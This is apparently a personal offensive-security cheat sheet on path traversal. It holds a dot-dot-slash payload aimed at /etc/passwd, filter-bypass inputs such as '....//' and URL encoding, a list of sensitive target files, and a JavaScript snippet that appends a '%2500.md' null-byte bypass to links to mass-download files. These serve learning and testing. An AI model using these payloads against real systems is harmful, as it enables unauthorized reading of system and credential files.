Path traversal
Path traversal is a vulnerability allowing a hacker will manage to access files/folders that were not supposed to be available for users by exploiting the application.
β οΈ You should use HTTP clients to perform path traversal attacks, as browsers may send something different from what you wrote.
For instance, http://example.com/image-preview.php?url=...
is supposed to display an image given a URL.
You can use the dot-dot-slash attack, and give a URL such as ../../../../../etc/passwd
. You can add more ../
than needed, but try to find the least number required.
It's used by others attacks such as File inclusion or SSRF.
Bypass filters
- If there is a function removing
../
, then you can craft a payload that will only work as expected once the input was filtered.
Input: ....//
Apply Filter: remove ../
Output: ../
- Try URL encoding
-
The path may have to start with a specific folder
-
Some systems support
/./
or//
in payloads -
Always start by a path to may work
π» To-do π»
Stuff that I found, but never read/used yet.
- default webserver roots
- can be fuzzed
- wordlists
-
default-web-root-directory-linux.txt
-
default-web-root-directory-windows.txt
- SecLists LFI
-
/etc/php/X.Y/apache2/php.ini
(web root) -
/etc/php/X.Y/fpm/php.ini
(web root)
-
-
/etc/passwd
-
C:\Windows\boot.ini
- Second Order Attack (poisoned database entry)
Array.from(document.querySelectorAll('a:not([hidden])')).map(e => {
let h = e.href
const name = h.substr(h.lastIndexOf("/")+1)
if (name === "") return 0;
if (!h.endsWith(".md")) h += "%2500.md"
const a = document.createElement('a')
a.setAttribute('href', h)
a.setAttribute('downlaod', name)
a.setAttribute('hidden', '')
a.setAttribute('target', '_blank')
document.body.appendChild(a)
a.click()
return 1
})